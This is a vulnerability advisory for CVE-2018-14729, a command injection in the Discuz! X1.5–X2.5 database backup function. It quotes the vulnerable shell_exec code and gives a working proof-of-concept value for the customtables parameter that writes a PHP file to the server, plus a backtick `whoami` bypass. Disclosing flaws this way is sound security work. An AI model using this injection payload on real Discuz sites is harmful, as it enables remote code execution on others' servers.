Discuz! X1.5 to X2.5's database backup function in file source/admincp/admincp_db.php allows remote attackers to execute arbitrary PHP code.
Source: https://github.com/FoolMitAh/CVE-2018-14729/blob/master/Discuz_backend_getshell.md
Description
Discuz! X1.5 to X2.5's database backup function in file source/admincp/admincp_db.php allows remote attackers to execute arbitrary PHP code.
VulnerabilityType Other
Remote Code Execution
Vendor of Product
Tencent
Affected Product Code Base
Discuz X1.5 - X2.5
Attack Type
Remote
Impact Code execution
true
Attack Vectors
Administrative Privileges Required
Has vendor confirmed or acknowledged the vulnerability?
true
Discoverer
[email protected] Tech
Detail
Take DiscuzX2.5 for example
source/admincp/admincp_db.php
# line 296
@shell_exec($mysqlbin.'mysqldump --force --quick '.($db->version() > '4.1' ? '--skip-opt --create-options' : '-all').' --add-drop-table'.($_GET['extendins'] == 1 ? ' --extended-insert' : '').''.($db->version() > '4.1' && $_GET['sqlcompat'] == 'MYSQL40' ? ' --compatible=mysql40' : '').' --host="'.$dbhost.($dbport ? (is_numeric($dbport) ? ' --port='.$dbport : ' --socket="'.$dbport.'"') : '').'" --user="'.$dbuser.'" --password="'.$dbpw.'" "'.$dbname.'" '.$tablesstr.' > '.$dumpfile);# line 281
$tablesstr = '';
foreach($tables as $table) {
$tablesstr .= '"'.$table.'" ';
}# line 143
$tables = & $_GET['customtables'];We can easily control the arg $tablesstr in function shell_exec() to execute code.
POC
change customtables[] = pre_common_admincp_cmenu">aaa; echo '<?php phpinfo(); ?>' > phpinfo.php #
Additional Information
Discuz - 1.5 - 2.0
$tables = $_G['gp_customtables']
use addslashes() to escape, but it still works by `whoami`
Discuz - 3.0 - 3.4
Developers wrote a bug, database backup feature doesn't work. However, the vunl still there.